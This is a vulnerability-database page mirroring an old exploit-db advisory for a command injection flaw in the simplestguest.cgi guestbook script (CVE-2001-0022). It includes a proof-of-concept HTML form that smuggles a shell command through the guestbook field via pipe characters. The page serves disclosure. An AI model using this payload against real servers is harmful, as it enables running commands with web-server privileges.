Lucene search
+L

Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution

🗓️ 14 Dec 2000 00:00:00Reported by suidType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Leif M. Wright's simplestguest.cgi has a vulnerability allowing remote command execution.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
simplestmail.cgi Multiple Vulnerabilities
20 Aug 200400:00
nessus
nessus
Tenable Nessus
Multiple Dangerous CGI Script Detection
17 Jun 200300:00
nessus
cve
CVE
CVE-2001-0022
2 Feb 200105:00
cve
cvelist
Cvelist
CVE-2001-0022
2 Feb 200105:00
cvelist
euvd
EUVD
EUVD-2001-0022
7 Oct 202500:30
euvd
nvd
NVD
CVE-2001-0022
12 Feb 200105:00
nvd
openvas
OpenVAS
Detection of various dangerous CGI scripts (HTTP) - Active Check
3 Nov 200500:00
openvas
source: https://www.securityfocus.com/bid/2106/info

A vulnerabiliy exists in Leif M. Wright's simplestguest.cgi, a script designed to coordinate guestbook submissions from website visitors.

An insecure call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privileges of the webserver.

Make a html form similar to:

<form action=/cgi-bin/simplestguest.cgi method=POST>
                 <input type=hidden name=required value="NAME">
                 <input type=hidden name=guestbook
                value=" | <COMMAND> |">
                 <input type=hidden name="NAME" value="user">
                 <input type=submit>
</form>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.1257
33